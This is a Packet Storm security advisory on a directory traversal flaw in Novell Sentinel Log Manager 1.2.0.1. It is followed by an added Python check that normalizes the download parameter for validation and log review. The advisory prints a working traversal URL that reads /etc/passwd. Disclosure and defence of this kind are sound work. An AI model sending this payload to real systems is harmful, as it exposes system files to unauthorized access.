Novell Sentinel Log Manager 1.2.0.1 Directory Traversal

2011-12-18T00:00:00
ID PACKETSTORM:107974
Type packetstorm
Reporter Andrea Fabrizi
Modified 2011-12-18T00:00:00

Description

                                        
**************************************************************
Vuln: Path Traversal
Application: Sentinel Log Manager
Vendor: Novell
Version affected: <= 1.2.0.1
Website: http://www.novell.com/products/sentinel-log-manager/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
**************************************************************

The latest version of Sentinel Log Manager is prone to a directory
traversal vulnerability that allows authenticated users to access
any system file.

Testing environment: Sentinel Log Manager Appliance 1.2.0.1

Vulnerable URL:
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd
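
A check for the filename parameter shown above, as an added example (not code from the advisory or from Novell): it normalizes the requested path and reports whether it stays under a base directory, which is usable both as a server-side validation rule and for reviewing access logs. The base directory is assumed from the advisory's URL; the function names and sample requests are constructed for illustration.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: downloads are meant to stay under the directory seen in the
# advisory's URL; the servlet's real intended base is not documented there.
BASE_DIR = "/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp"
ENDPOINT = "/novelllogmanager/FileDownload"


def resolve_filename(raw_value, max_rounds=3):
    """Percent-decode until stable, then collapse '.' and '..' segments."""
    value = raw_value
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    # Relative names resolve against BASE_DIR; absolute names are kept as given.
    return posixpath.normpath(posixpath.join(BASE_DIR, value.replace("\\", "/")))


def is_inside_base(resolved):
    """True only if the normalized path is BASE_DIR or sits below it."""
    return resolved == BASE_DIR or resolved.startswith(BASE_DIR + "/")


def check_request(url):
    """Return (resolved_path, allowed) for a FileDownload request, else None."""
    parts = urlsplit(url)
    if parts.path != ENDPOINT:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("filename")
    if not values:
        return None
    resolved = resolve_filename(values[0])
    return resolved, is_inside_base(resolved)


# Constructed sample requests; the second is the URL from the advisory.
SAMPLES = [
    ENDPOINT + "?filename=" + BASE_DIR + "/report.zip",
    ENDPOINT + "?filename=" + BASE_DIR + "/../../../../../../etc/passwd",
    "/novelllogmanager/Other?filename=ignored",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", check_request(sample))
```

This version compares strings only, so it can run over logs; a check inside the application should make the same comparison on the real path after symlink resolution.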